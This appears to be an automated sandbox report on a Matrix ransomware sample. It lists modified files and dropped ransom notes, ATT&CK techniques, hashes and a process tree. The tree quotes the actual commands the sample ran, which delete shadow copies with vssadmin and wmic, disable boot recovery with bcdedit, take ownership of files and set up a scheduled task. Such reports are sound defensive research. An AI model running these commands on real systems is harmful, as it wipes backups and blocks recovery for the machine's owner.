DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sk-sk\ui-strings.js 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sv-se\ui-strings.js 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusVL_KMS_Client-ul.xrm-ms 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-search_ja.jar 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial4-ppd.xrm-ms 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp4-ul-phn.xrm-ms 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\init.js 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\illustrations.png 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.xml 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial5-ul-oob.xrm-ms 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\codec\libschroedinger_plugin.dll 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.xml 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_OEM_Perp-pl.xrm-ms 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\icons.png 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\hr-hr\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-cn\ui-strings.js 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fr-ma\ui-strings.js 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Microsoft Office\root\Client\api-ms-win-core-xstate-l2-1-0.dll 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\mscss7wre_es.dub 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\VisualElements\LogoBeta.png 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription3-ppd.xrm-ms 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN096.XML 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\offfiltx.dll 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\digsig_icons_2x.png 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sv-se\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\7-Zip\Lang\zh-cn.txt 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_zh_CN.jar 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_ja.jar 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\it\System.Xml.Linq.Resources.dll 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\blafdoc.css 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest1-pl.xrm-ms 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\7-Zip\Lang\fur.txt 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PPINTL.DLL 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_OEM_Perp-ppd.xrm-ms 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\video_filter\libblend_plugin.dll 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\root\ui-strings.js 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Dark.pdf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\7-Zip\Lang\ca.txt 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-compat.xml 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\GARA.TTF 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Mozilla Firefox\xul.dll.sig 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\adodb.dll 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\cs-cz\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-javahelp.xml 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-api.xml 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\TelemetryLog.xltx 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3788 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3372 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 3052 powershell.exe 3052 powershell.exe 3708 trT2KPvl64.exe 3708 trT2KPvl64.exe 3708 trT2KPvl64.exe 3708 trT2KPvl64.exe 3708 trT2KPvl64.exe 3708 trT2KPvl64.exe 3708 trT2KPvl64.exe 3708 trT2KPvl64.exe 3708 trT2KPvl64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 3708 trT2KPvl64.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
description pid Process Token: SeDebugPrivilege 3052 powershell.exe Token: SeTakeOwnershipPrivilege 4468 takeown.exe Token: SeDebugPrivilege 3708 trT2KPvl64.exe Token: SeLoadDriverPrivilege 3708 trT2KPvl64.exe Token: SeBackupPrivilege 3476 vssvc.exe Token: SeRestorePrivilege 3476 vssvc.exe Token: SeAuditPrivilege 3476 vssvc.exe Token: SeIncreaseQuotaPrivilege 3312 WMIC.exe Token: SeSecurityPrivilege 3312 WMIC.exe Token: SeTakeOwnershipPrivilege 3312 WMIC.exe Token: SeLoadDriverPrivilege 3312 WMIC.exe Token: SeSystemProfilePrivilege 3312 WMIC.exe Token: SeSystemtimePrivilege 3312 WMIC.exe Token: SeProfSingleProcessPrivilege 3312 WMIC.exe Token: SeIncBasePriorityPrivilege 3312 WMIC.exe Token: SeCreatePagefilePrivilege 3312 WMIC.exe Token: SeBackupPrivilege 3312 WMIC.exe Token: SeRestorePrivilege 3312 WMIC.exe Token: SeShutdownPrivilege 3312 WMIC.exe Token: SeDebugPrivilege 3312 WMIC.exe Token: SeSystemEnvironmentPrivilege 3312 WMIC.exe Token: SeRemoteShutdownPrivilege 3312 WMIC.exe Token: SeUndockPrivilege 3312 WMIC.exe Token: SeManageVolumePrivilege 3312 WMIC.exe Token: 33 3312 WMIC.exe Token: 34 3312 WMIC.exe Token: 35 3312 WMIC.exe Token: 36 3312 WMIC.exe Token: SeIncreaseQuotaPrivilege 3312 WMIC.exe Token: SeSecurityPrivilege 3312 WMIC.exe Token: SeTakeOwnershipPrivilege 3312 WMIC.exe Token: SeLoadDriverPrivilege 3312 WMIC.exe Token: SeSystemProfilePrivilege 3312 WMIC.exe Token: SeSystemtimePrivilege 3312 WMIC.exe Token: SeProfSingleProcessPrivilege 3312 WMIC.exe Token: SeIncBasePriorityPrivilege 3312 WMIC.exe Token: SeCreatePagefilePrivilege 3312 WMIC.exe Token: SeBackupPrivilege 3312 WMIC.exe Token: SeRestorePrivilege 3312 WMIC.exe Token: SeShutdownPrivilege 3312 WMIC.exe Token: SeDebugPrivilege 3312 WMIC.exe Token: SeSystemEnvironmentPrivilege 3312 WMIC.exe Token: SeRemoteShutdownPrivilege 3312 WMIC.exe Token: SeUndockPrivilege 3312 WMIC.exe Token: SeManageVolumePrivilege 3312 WMIC.exe Token: 33 3312 WMIC.exe Token: 34 3312 WMIC.exe Token: 35 3312 WMIC.exe Token: 36 3312 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 956 wrote to memory of 4628 956 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe 81 PID 956 wrote to memory of 4628 956 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe 81 PID 956 wrote to memory of 4628 956 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe 81 PID 956 wrote to memory of 4340 956 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe 83 PID 956 wrote to memory of 4340 956 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe 83 PID 956 wrote to memory of 4340 956 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe 83 PID 956 wrote to memory of 988 956 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe 85 PID 956 wrote to memory of 988 956 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe 85 PID 956 wrote to memory of 988 956 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe 85 PID 988 wrote to memory of 3052 988 cmd.exe 87 PID 988 wrote to memory of 3052 988 cmd.exe 87 PID 988 wrote to memory of 3052 988 cmd.exe 87 PID 956 wrote to memory of 812 956 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe 88 PID 956 wrote to memory of 812 956 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe 88 PID 956 wrote to memory of 812 956 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe 88 PID 956 wrote to memory of 588 956 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe 90 PID 956 wrote to memory of 588 956 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe 90 PID 956 wrote to memory of 588 956 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe 90 PID 812 wrote to memory of 4868 812 cmd.exe 92 PID 812 wrote to memory of 4868 812 cmd.exe 92 PID 812 wrote to memory of 4868 812 cmd.exe 92 PID 588 wrote to memory of 4276 588 cmd.exe 93 PID 588 wrote to memory of 4276 588 cmd.exe 93 PID 588 wrote to memory of 4276 588 cmd.exe 93 PID 812 wrote to memory of 2104 812 cmd.exe 94 PID 812 wrote to memory of 2104 812 cmd.exe 94 PID 812 wrote to memory of 2104 812 cmd.exe 94 PID 812 wrote to memory of 4780 812 cmd.exe 95 PID 812 wrote to memory of 4780 812 cmd.exe 95 PID 812 wrote to memory of 4780 812 cmd.exe 95 PID 956 wrote to memory of 668 956 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe 96 PID 956 wrote to memory of 668 956 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe 96 PID 956 wrote to memory of 668 956 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe 96 PID 668 wrote to memory of 3616 668 cmd.exe 98 PID 668 wrote to memory of 3616 668 cmd.exe 98 PID 668 wrote to memory of 3616 668 cmd.exe 98 PID 668 wrote to memory of 4392 668 cmd.exe 102 PID 668 wrote to memory of 4392 668 cmd.exe 102 PID 668 wrote to memory of 4392 668 cmd.exe 102 PID 668 wrote to memory of 4468 668 cmd.exe 103 PID 668 wrote to memory of 4468 668 cmd.exe 103 PID 668 wrote to memory of 4468 668 cmd.exe 103 PID 668 wrote to memory of 1652 668 cmd.exe 104 PID 668 wrote to memory of 1652 668 cmd.exe 104 PID 668 wrote to memory of 1652 668 cmd.exe 104 PID 1652 wrote to memory of 4040 1652 cmd.exe 105 PID 1652 wrote to memory of 4040 1652 cmd.exe 105 PID 1652 wrote to memory of 4040 1652 cmd.exe 105 PID 4040 wrote to memory of 3708 4040 trT2KPvl.exe 107 PID 4040 wrote to memory of 3708 4040 trT2KPvl.exe 107 PID 4276 wrote to memory of 3976 4276 wscript.exe 108 PID 4276 wrote to memory of 3976 4276 wscript.exe 108 PID 4276 wrote to memory of 3976 4276 wscript.exe 108 PID 3976 wrote to memory of 3788 3976 cmd.exe 110 PID 3976 wrote to memory of 3788 3976 cmd.exe 110 PID 3976 wrote to memory of 3788 3976 cmd.exe 110 PID 4276 wrote to memory of 4360 4276 wscript.exe 111 PID 4276 wrote to memory of 4360 4276 wscript.exe 111 PID 4276 wrote to memory of 4360 4276 wscript.exe 111 PID 4360 wrote to memory of 1120 4360 cmd.exe 113 PID 4360 wrote to memory of 1120 4360 cmd.exe 113 PID 4360 wrote to memory of 1120 4360 cmd.exe 113 PID 1064 wrote to memory of 3372 1064 cmd.exe 118 PID 1064 wrote to memory of 3372 1064 cmd.exe 118 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3616 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe"C:\Users\Admin\AppData\Local\Temp\2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe"1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:956 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe" "C:\Users\Admin\AppData\Local\Temp\NWDFhFTl.exe"2⤵PID:4628
-
-
C:\Users\Admin\AppData\Local\Temp\NWDFhFTl.exe"C:\Users\Admin\AppData\Local\Temp\NWDFhFTl.exe" -n2⤵
- Executes dropped EXE
PID:4340
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\sXjDdMFW.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:988 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3052
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\5P8E7x8U.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:812 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\5P8E7x8U.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:4868
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:2104
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:4780
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\xhrZizj0.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:588 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\xhrZizj0.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4276 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\ZMejHEtF.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:3976 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\ZMejHEtF.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:3788
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵
- Suspicious use of WriteProcessMemory
PID:4360 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:1120
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ha9kdW4l.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""2⤵
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Windows\SysWOW64\attrib.exeattrib -R -A -S "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵
- Views/modifies file attributes
PID:3616
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵PID:4392
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c trT2KPvl.exe -accepteula "store.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Users\Admin\AppData\Local\Temp\trT2KPvl.exetrT2KPvl.exe -accepteula "store.db" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4040 -
C:\Users\Admin\AppData\Local\Temp\trT2KPvl64.exetrT2KPvl.exe -accepteula "store.db" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Sets service image path in registry
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:3708
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\ZMejHEtF.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
PID:3372
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3312
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:2308
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1460
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F2⤵PID:1676
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3476
Network
MITRE ATT&CK Enterprise v6
Persistence
Hidden Files and Directories
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File Deletion
2File and Directory Permissions Modification
1Hidden Files and Directories
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5aab7c9a144728592e081204149ac025d
SHA1f0ca4c65e3d968cdf590e38d5ddbb68c255cf234
SHA25619f088d0fcd5ea978c4b6b8c24d672bf5f83b5b336ff51c02c842914d7079e50
SHA512c754b91f0adcf012b2f989e3c6092922fdf26a2573154c47509dee7a4658f3fd5b621a85cd3f9e04b452e07451bdae7f2a52e7cd8540279a0c96b95c8f22b2d7
-
Filesize
3KB
MD55cf1bc3b00a2055ddc75f7af0b0b6377
SHA160646f1eb3e7d0723518ad45b46a4b617fe06e5f
SHA25690151eb9ed08a758902863a321d592b73b12caa63e8d34975caf943aca6ba0a4
SHA512959d188df646c561b3ab2a3c58b67075a011dbfc211fac4d5457f359effa2e80e875df1a7e230cc204ab313fdddc6681eb70067e298a247a87d866752d2fdb5f
-
Filesize
610KB
MD51c73c307773fedfccd544a6b6b0b55b9
SHA1899ffd934e0b8a6df4b115c49df33fca524e2135
SHA2562e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376
SHA512049211f9d07e3cca9f92dfb1bc2e0f6895586f9f36b2651ffb2de20f3573ba9d719aff27e67b996f4706852578e919810e3e6854eebf0aaff0d412d8cabc127d
-
Filesize
610KB
MD51c73c307773fedfccd544a6b6b0b55b9
SHA1899ffd934e0b8a6df4b115c49df33fca524e2135
SHA2562e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376
SHA512049211f9d07e3cca9f92dfb1bc2e0f6895586f9f36b2651ffb2de20f3573ba9d719aff27e67b996f4706852578e919810e3e6854eebf0aaff0d412d8cabc127d
-
Filesize
246B
MD5e9b887c0c3d72d5463d15a53d38d455b
SHA10a8c2c4d509234a9022ee6ce995ec60e0968d987
SHA25677d9d6c2b32554897f40ffb5b613fa8b18407676cdb4dfd093ae45b5feb8a110
SHA512a11a2867712b9293b0b6d4e405d8c9c1a0a02dfde2b8761bd6d46578a464c4bebc5ff36d5b9579e1acce25f99d5e5faab63f6edb7cd2ed8bd65b3d793bddc99e
-
Filesize
14B
MD58eb51985066cb0782077f624013d47a2
SHA10549d07d51454e73b937946ba1887cacfce71835
SHA2565537d10911f09132033b185344f75ea1a0ed7e5509b3be00bd8bc93d477baa44
SHA512539a7160bb41366a74d8859b080724f5838132428f672c2bba7ef9c9a259823f15074adec75567bea6724f09d681c04b8763a2f495eff3436ff17420cb7bf0f5
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
